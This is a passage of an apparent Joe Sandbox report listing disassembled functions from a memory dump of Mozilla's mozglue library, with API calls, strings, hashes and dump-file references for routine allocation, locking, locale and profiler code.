free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9FDEFD,?,6C9C4A68), ref: 6CA0DF32

Part of subcall function 6CA0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CA0DB86
Part of subcall function 6CA0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CA0DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9FDEFD,?,6C9C4A68), ref: 6CA0DF65
free.MOZGLUE(?), ref: 6CA0DF80

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 3c3302cb0316099f62dcbe6b065b8550762733250ea06249b232bf6c6e9285c3
Instruction ID: 688cc26c3fbf8ba275073ba85c10a49a22990731232e3c1e816d1e86580d4fe9
Opcode Fuzzy Hash: 3c3302cb0316099f62dcbe6b065b8550762733250ea06249b232bf6c6e9285c3
Instruction Fuzzy Hash: CB51C977F017119BD7119B18E8806AEB372BFA178CF59451CD41A53B00D731F899CB92

Function 6CA15D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15DC9
std::_Facet_Register.LIBCPMT ref: 6CA15DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15E45

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 23812aefa1843b3667f06876475f2858843b12afd4719fb6fbc8a0a4de397984
Instruction ID: 2323f0caab8312e11cf3a5541244b19f863ba2430573476574e9188850e045ee
Opcode Fuzzy Hash: 23812aefa1843b3667f06876475f2858843b12afd4719fb6fbc8a0a4de397984
Instruction Fuzzy Hash: D941D5307043058FDB14DF65DC99AAD77B6EF89358F088169D50A9BB81DB34DC46CB60

Function 6C9ECC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9B31A7), ref: 6C9ECDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C9ECFA4, 6C9ECFB8
<jemalloc>, xrefs: 6C9ECF9F, 6C9ECFB3

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 3745dd134d49d7fd2b85e663dbce110aa97ac8e9631459e759652f4adf5cec35
Instruction ID: 736213b765598456f953d2d5a6f24a4adb78b49d3cbc6cb3cfa1d4b2d12ba1e3
Opcode Fuzzy Hash: 3745dd134d49d7fd2b85e663dbce110aa97ac8e9631459e759652f4adf5cec35
Instruction Fuzzy Hash: 8D31D630B403169BEF16AEA98C55BAE7F7ABF59714F304518F658EB6C0DB70D80187A0

Function 6C9BECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9BF100: LoadLibraryW.KERNEL32(shell32,?,6CA2D020), ref: 6C9BF122
Part of subcall function 6C9BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C9BF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C9BED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9BEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C9BEDCC
CreateFileW.KERNEL32 ref: 6C9BEE08
free.MOZGLUE(00000000), ref: 6C9BEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C9BEE32

Part of subcall function 6C9BEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C9BEBB5
Part of subcall function 6C9BEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C9ED7F3), ref: 6C9BEBC3
Part of subcall function 6C9BEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C9ED7F3), ref: 6C9BEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C9BEDC1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 857621ed5222b6bf436b4289a86126557e59d432faa8dbfb88352c06f5381418
Instruction ID: a15b0447af661ab4a9d7f42ba240550bcee8131f2c4007e41020dffda99d9723
Opcode Fuzzy Hash: 857621ed5222b6bf436b4289a86126557e59d432faa8dbfb88352c06f5381418
Instruction Fuzzy Hash: 5651F171D05318ABDB01DF68C8446EFB7B8AF69318F04846DE8557B740E774E988C7A2

Function 6CA2A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CA2A565

Part of subcall function 6CA2A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA2A4BE
Part of subcall function 6CA2A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA2A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CA2A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CA2A6B6

Strings

0, xrefs: 6CA2A5FB
z, xrefs: 6CA2A6AE

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 8093a117ef299489c7265058dcfb996dc5edb3dae64966d563553f5c3dc86fa2
Instruction ID: 40faabbfe3888b9619387715c25ea2c6e65d6523ff245a40819afe60c8eba358
Opcode Fuzzy Hash: 8093a117ef299489c7265058dcfb996dc5edb3dae64966d563553f5c3dc86fa2
Instruction Fuzzy Hash: 314139719097459FC341DF28C480A8FBBF5BF99354F448A2EF49987650EB34D989CB82

Function 6C9B78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6CA3008B), ref: 6C9B7B89
free.MOZGLUE(?,6CA3008B), ref: 6C9B7BAC

Part of subcall function 6C9B78C0: free.MOZGLUE(?,6CA3008B), ref: 6C9B7BCF

free.MOZGLUE(?,6CA3008B), ref: 6C9B7BF2

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: ad8eb8f4f46a1c3b9817a52cc9dbde80e8d2123c33de30a941be3ff5c851eec6
Instruction ID: 2665b18e3e03000b6cb933b11382fa25f61073670e69ca8ee1f75eb65389e5e1
Opcode Fuzzy Hash: ad8eb8f4f46a1c3b9817a52cc9dbde80e8d2123c33de30a941be3ff5c851eec6
Instruction Fuzzy Hash: 53C1B671E011299BEB248B28CC90BAEB772AF51314F1547A9D41AF7BC0C731EE858F61

Function 6C9F9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
__Init_thread_footer.LIBCMT ref: 6C9F949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9F946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9F9459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9F947D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 56f54aab36795aa8b6ccf0fc8875b7ed902ac7e856af44d2de4b83836ad3ccfa
Instruction ID: b1035a8adaf52a2301479520f20e761c1e4a01099db15c4c2e89d37e76d0c2ef
Opcode Fuzzy Hash: 56f54aab36795aa8b6ccf0fc8875b7ed902ac7e856af44d2de4b83836ad3ccfa
Instruction Fuzzy Hash: 7C016D34A002229BD7149F1CED749453378AB1632CF09453BD91EC6B41D725D4978A6B

Function 6CA00F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA00F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA00F88
GetCurrentThreadId.KERNEL32 ref: 6CA00FF7
InitializeConditionVariable.KERNEL32(?), ref: 6CA01067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CA010A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CA0114B

Part of subcall function 6C9F8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA11563), ref: 6C9F8BD5

free.MOZGLUE(?), ref: 6CA01174
free.MOZGLUE(?), ref: 6CA01186

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: c3c6b53cfa2dacf6e40ce2fdb1f10301fddf00576a02a9d142b3013d718ad814
Instruction ID: 82e714d044665f11cd770dfbd4d0c32e45d1db2e4d975bacffd1dcfd9ad28c12
Opcode Fuzzy Hash: c3c6b53cfa2dacf6e40ce2fdb1f10301fddf00576a02a9d142b3013d718ad814
Instruction Fuzzy Hash: 8761E075A043419BCB14CF24E9807AAB7F6BFD934CF04891DE98947712EB31E889CB81

Function 6C9BB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6AC

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C9BB61E), ref: 6C9BB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB79A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: bf97676e2a77a9a02bd8eb6c4a84e68db60b0c08b4520fe63344f76e1369df9f
Instruction ID: 4597c38385d694ac31b2d55e3a51722bbd42a27bf851e123b7605e31a491a50d
Opcode Fuzzy Hash: bf97676e2a77a9a02bd8eb6c4a84e68db60b0c08b4520fe63344f76e1369df9f
Instruction Fuzzy Hash: 5541A1B2D00115AFCB14DF68DCD46AFB7B9FB54324B290629E825E7780E731E9058BE1

Function 6C9BEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6CA35104), ref: 6C9BEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C9BEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9BEFEC
free.MOZGLUE(?), ref: 6C9BF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C9BF02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C9BF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BF065
moz_xmalloc.MOZGLUE ref: 6C9BF072

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: b2d16110ea433534adcdfa0e47144f655776ff76ccacf685fa16a45c6acb8d09
Instruction ID: c67efad1781191e47b441b7d795fe88a6671aa17a79ed227b1280da9bcca50e0
Opcode Fuzzy Hash: b2d16110ea433534adcdfa0e47144f655776ff76ccacf685fa16a45c6acb8d09
Instruction Fuzzy Hash: 1841F8B5A00216AFCB18CF68DC805BF7769AF94328B244628E815D77A4EB31E915C7E1

Function 6CA2B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CA2B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CA2B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CA2B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CA2B5F4
__Init_thread_footer.LIBCMT ref: 6CA2B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CA2B61F
std::_Facet_Register.LIBCPMT ref: 6CA2B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA2B655

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 8714c2ed815d369f90424956f5b0dd155b9b377b79165d81890cc98d4646ca7f
Instruction ID: 2fc1d8e8172da66da721d9a158f78fdd4b3ce6bc8ffde899f920958c559ae9d2
Opcode Fuzzy Hash: 8714c2ed815d369f90424956f5b0dd155b9b377b79165d81890cc98d4646ca7f
Instruction Fuzzy Hash: 1531F671B00312CBCB15DB54DC688AE77B5FF9A368B084559E90AD7340CB3498478B91

Function 6C9C9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6CA17ABE), ref: 6C9C985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CA17ABE), ref: 6C9C98A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C9C9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C9C9918
free.MOZGLUE(?), ref: 6C9C9975

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 3ddf64aed1b1ee63631737683a9a431a77745063b02be2f94d059fc0eecf4d81
Instruction ID: 426d91fcbb29cde57a87691a1e0f5d7ee959af6e61c154d25bb87291170f316e
Opcode Fuzzy Hash: 3ddf64aed1b1ee63631737683a9a431a77745063b02be2f94d059fc0eecf4d81
Instruction Fuzzy Hash: D8718B75604706CFC725CF28C480966B7F5FF4A3287264AA9D85A8BBA0D731F846CB52

Function 6C9CB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE), ref: 6C9CB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB896

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: aaa22b5b9b8f3dd9414f3a734db7dc38f27d73c732bf960dd3762ffe3cf5673b
Instruction ID: 68b314f65891e9c8192f4e6fc2a6267564ecce9e236adf1a2a212f4d8161fe25
Opcode Fuzzy Hash: aaa22b5b9b8f3dd9414f3a734db7dc38f27d73c732bf960dd3762ffe3cf5673b
Instruction Fuzzy Hash: 08518C357006018FDB25CF59C4D4A2AB7F6FF89318B59859DE98A97341C731EC02CB82

Function 6CA01D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA01D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6CA01BE3,?,?,6CA01D96,00000000), ref: 6CA01D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6CA01BE3,?,?,6CA01D96,00000000), ref: 6CA01D4C
GetCurrentThreadId.KERNEL32 ref: 6CA01DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CA01DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA01DDA

Part of subcall function 6CA01EF0: GetCurrentThreadId.KERNEL32 ref: 6CA01F03
Part of subcall function 6CA01EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CA01DF2,00000000,00000000), ref: 6CA01F0C
Part of subcall function 6CA01EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CA01F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CA01DF4

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

Memory Dump Source

